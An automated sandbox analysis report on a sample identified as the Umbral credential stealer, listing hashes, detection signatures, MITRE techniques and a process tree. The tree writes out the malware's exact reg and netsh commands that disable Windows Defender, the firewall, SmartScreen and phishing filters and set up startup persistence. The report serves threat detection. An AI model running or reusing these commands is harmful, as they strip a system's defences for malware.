umbral | 014984b4b81ac3aee22523fc6a79030159f63a0f79ba6028dde7dd8795b1c325

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
13-03-2024 06:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KiwiX(vira)/Inj.exe
Size

37KB
MD5

46575abc24c74bb039259908b0231c95
SHA1

17dc60529ec69d46ce60ca45c6f6396e3462960c
SHA256

443a8d301e9bcda70076375978a3d32a9a1c9552bf84aa9cbdd68635a07cdeda
SHA512

89c234a4889817b665eaf61beb562b35a2bd269ed2d54dab6dc430cb3ab1a121e3a399046516050f442e25e35c4e14915ddf6aa983d4c1011b36749b5f8fb550
SSDEEP

384:NA8syikT2zIuMXY1uyZD7jKuo3HCsmY3NrAF+rMRTyN/0L+EcoinblneHQM3epzp:+yY1lN7uuoSNY9rM+rMRa8NuBy8t

Score

10^/10

umbral evasion persistence stealer trojan

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral6/files/0x0007000000023265-13.dat	family_umbral
behavioral6/memory/3560-20-0x000001B2D25B0000-0x000001B2D25F0000-memory.dmp	family_umbral

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies firewall policy service 2 TTPs 8 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PrivateProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PrivateProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1072	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	Inj.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	Inj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe	Inj.exe

Executes dropped EXE 2 IoCs

pid	Process
3560	tmpD6B9.tmp.exe
6108	tmpCA05.tmp.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\KiwiX(vira)\\Inj.exe\" .."	Inj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\KiwiX(vira)\\Inj.exe\" .."	Inj.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\PreventOverride = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4496	Inj.exe
4496	Inj.exe
4496	Inj.exe
4496	Inj.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: SeDebugPrivilege	3560	tmpD6B9.tmp.exe
Token: SeIncreaseQuotaPrivilege	1656	wmic.exe
Token: SeSecurityPrivilege	1656	wmic.exe
Token: SeTakeOwnershipPrivilege	1656	wmic.exe
Token: SeLoadDriverPrivilege	1656	wmic.exe
Token: SeSystemProfilePrivilege	1656	wmic.exe
Token: SeSystemtimePrivilege	1656	wmic.exe
Token: SeProfSingleProcessPrivilege	1656	wmic.exe
Token: SeIncBasePriorityPrivilege	1656	wmic.exe
Token: SeCreatePagefilePrivilege	1656	wmic.exe
Token: SeBackupPrivilege	1656	wmic.exe
Token: SeRestorePrivilege	1656	wmic.exe
Token: SeShutdownPrivilege	1656	wmic.exe
Token: SeDebugPrivilege	1656	wmic.exe
Token: SeSystemEnvironmentPrivilege	1656	wmic.exe
Token: SeRemoteShutdownPrivilege	1656	wmic.exe
Token: SeUndockPrivilege	1656	wmic.exe
Token: SeManageVolumePrivilege	1656	wmic.exe
Token: 33	1656	wmic.exe
Token: 34	1656	wmic.exe
Token: 35	1656	wmic.exe
Token: 36	1656	wmic.exe
Token: SeIncreaseQuotaPrivilege	1656	wmic.exe
Token: SeSecurityPrivilege	1656	wmic.exe
Token: SeTakeOwnershipPrivilege	1656	wmic.exe
Token: SeLoadDriverPrivilege	1656	wmic.exe
Token: SeSystemProfilePrivilege	1656	wmic.exe
Token: SeSystemtimePrivilege	1656	wmic.exe
Token: SeProfSingleProcessPrivilege	1656	wmic.exe
Token: SeIncBasePriorityPrivilege	1656	wmic.exe
Token: SeCreatePagefilePrivilege	1656	wmic.exe
Token: SeBackupPrivilege	1656	wmic.exe
Token: SeRestorePrivilege	1656	wmic.exe
Token: SeShutdownPrivilege	1656	wmic.exe
Token: SeDebugPrivilege	1656	wmic.exe
Token: SeSystemEnvironmentPrivilege	1656	wmic.exe
Token: SeRemoteShutdownPrivilege	1656	wmic.exe
Token: SeUndockPrivilege	1656	wmic.exe
Token: SeManageVolumePrivilege	1656	wmic.exe
Token: 33	1656	wmic.exe
Token: 34	1656	wmic.exe
Token: 35	1656	wmic.exe
Token: 36	1656	wmic.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe
Token: 33	4496	Inj.exe
Token: SeIncBasePriorityPrivilege	4496	Inj.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4004	firefox.exe
4004	firefox.exe
4004	firefox.exe
4004	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4004	firefox.exe
4004	firefox.exe
4004	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4004	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4496 wrote to memory of 1072	4496	Inj.exe	97
PID 4496 wrote to memory of 1072	4496	Inj.exe	97
PID 4496 wrote to memory of 1072	4496	Inj.exe	97
PID 4496 wrote to memory of 3560	4496	Inj.exe	105
PID 4496 wrote to memory of 3560	4496	Inj.exe	105
PID 3560 wrote to memory of 1656	3560	tmpD6B9.tmp.exe	106
PID 3560 wrote to memory of 1656	3560	tmpD6B9.tmp.exe	106
PID 4496 wrote to memory of 960	4496	Inj.exe	108
PID 4496 wrote to memory of 960	4496	Inj.exe	108
PID 4496 wrote to memory of 960	4496	Inj.exe	108
PID 960 wrote to memory of 2952	960	cmd.exe	110
PID 960 wrote to memory of 2952	960	cmd.exe	110
PID 960 wrote to memory of 2952	960	cmd.exe	110
PID 960 wrote to memory of 4488	960	cmd.exe	111
PID 960 wrote to memory of 4488	960	cmd.exe	111
PID 960 wrote to memory of 4488	960	cmd.exe	111
PID 960 wrote to memory of 4408	960	cmd.exe	112
PID 960 wrote to memory of 4408	960	cmd.exe	112
PID 960 wrote to memory of 4408	960	cmd.exe	112
PID 960 wrote to memory of 4504	960	cmd.exe	113
PID 960 wrote to memory of 4504	960	cmd.exe	113
PID 960 wrote to memory of 4504	960	cmd.exe	113
PID 960 wrote to memory of 1988	960	cmd.exe	114
PID 960 wrote to memory of 1988	960	cmd.exe	114
PID 960 wrote to memory of 1988	960	cmd.exe	114
PID 960 wrote to memory of 116	960	cmd.exe	115
PID 960 wrote to memory of 116	960	cmd.exe	115
PID 960 wrote to memory of 116	960	cmd.exe	115
PID 960 wrote to memory of 1668	960	cmd.exe	116
PID 960 wrote to memory of 1668	960	cmd.exe	116
PID 960 wrote to memory of 1668	960	cmd.exe	116
PID 960 wrote to memory of 4696	960	cmd.exe	117
PID 960 wrote to memory of 4696	960	cmd.exe	117
PID 960 wrote to memory of 4696	960	cmd.exe	117
PID 960 wrote to memory of 3484	960	cmd.exe	118
PID 960 wrote to memory of 3484	960	cmd.exe	118
PID 960 wrote to memory of 3484	960	cmd.exe	118
PID 960 wrote to memory of 2136	960	cmd.exe	119
PID 960 wrote to memory of 2136	960	cmd.exe	119
PID 960 wrote to memory of 2136	960	cmd.exe	119
PID 960 wrote to memory of 4492	960	cmd.exe	120
PID 960 wrote to memory of 4492	960	cmd.exe	120
PID 960 wrote to memory of 4492	960	cmd.exe	120
PID 960 wrote to memory of 3428	960	cmd.exe	121
PID 960 wrote to memory of 3428	960	cmd.exe	121
PID 960 wrote to memory of 3428	960	cmd.exe	121
PID 960 wrote to memory of 4268	960	cmd.exe	122
PID 960 wrote to memory of 4268	960	cmd.exe	122
PID 960 wrote to memory of 4268	960	cmd.exe	122
PID 960 wrote to memory of 1376	960	cmd.exe	123
PID 960 wrote to memory of 1376	960	cmd.exe	123
PID 960 wrote to memory of 1376	960	cmd.exe	123
PID 960 wrote to memory of 2288	960	cmd.exe	124
PID 960 wrote to memory of 2288	960	cmd.exe	124
PID 960 wrote to memory of 2288	960	cmd.exe	124
PID 960 wrote to memory of 3468	960	cmd.exe	125
PID 960 wrote to memory of 3468	960	cmd.exe	125
PID 960 wrote to memory of 3468	960	cmd.exe	125
PID 960 wrote to memory of 2364	960	cmd.exe	126
PID 960 wrote to memory of 2364	960	cmd.exe	126
PID 960 wrote to memory of 2364	960	cmd.exe	126
PID 960 wrote to memory of 408	960	cmd.exe	127
PID 960 wrote to memory of 408	960	cmd.exe	127
PID 960 wrote to memory of 408	960	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\KiwiX(vira)\Inj.exe
"C:\Users\Admin\AppData\Local\Temp\KiwiX(vira)\Inj.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4496
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\KiwiX(vira)\Inj.exe" "Inj.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:1072
- C:\Users\Admin\AppData\Local\Temp\tmpD6B9.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpD6B9.tmp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3560
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA22.tmp.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PrivateProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:1988
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PrivateProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:4696
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "0" /f
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "ShellSmartScreenLevel" /t REG_SZ /d "Warn" /f
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenPuaEnabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t REG_DWORD /d "0" /f
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
    3⤵
    - Modifies registry class
    PID:2364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t REG_DWORD /d "0" /f
    3⤵
    - Modifies registry class
    PID:408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t REG_DWORD /d "0" /f
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v "PreventSmartScreenPromptOverride" /t REG_DWORD /d "0" /f
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0" /v "2301" /t REG_DWORD /d "1" /f
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t REG_SZ /d "Anywhere" /f
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t "REG_DWORD" /d "0" /f
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
    3⤵
    PID:2072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1589.tmp.bat" "
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v AllowFastServiceStartup /t REG_DWORD /d 0 /f
    3⤵
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1896
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:3996
- C:\Users\Admin\AppData\Local\Temp\tmpCA05.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpCA05.tmp.exe"
  2⤵
  - Executes dropped EXE
  PID:6108
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1980

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1376
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.0.1792776013\1622359914" -parentBuildID 20221007134813 -prefsHandle 1828 -prefMapHandle 1820 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {21d50f93-28b0-4628-8035-1196dc59a703} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 1920 1cd253ee558 gpu
    3⤵
    PID:4816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.1.1601983854\2091691333" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff7a91e8-50db-4880-b73d-371e856ed225} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 2364 1cd18872558 socket
    3⤵
    - Checks processor information in registry
    PID:448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.2.728552535\1524784844" -childID 1 -isForBrowser -prefsHandle 3076 -prefMapHandle 2932 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0e239b9-50ab-47c4-91f0-48b78323879c} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 2936 1cd28ea0958 tab
    3⤵
    PID:3396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.3.405895827\665053616" -childID 2 -isForBrowser -prefsHandle 3592 -prefMapHandle 3588 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cf529df-672e-4601-b684-a0defa29d2c1} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 3604 1cd272b2e58 tab
    3⤵
    PID:3284
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4004.4.608706253\99401341" -childID 3 -isForBrowser -prefsHandle 1696 -prefMapHandle 4160 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1396 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0bdf7c2-cc70-4f6d-bc37-b5a1912418cb} 4004 "\\.\pipe\gecko-crash-server-pipe.4004" 4484 1cd2ac63e58 tab
    3⤵
    PID:1596
- - C:\Program Files\Mozilla Firefox\firefox.exe
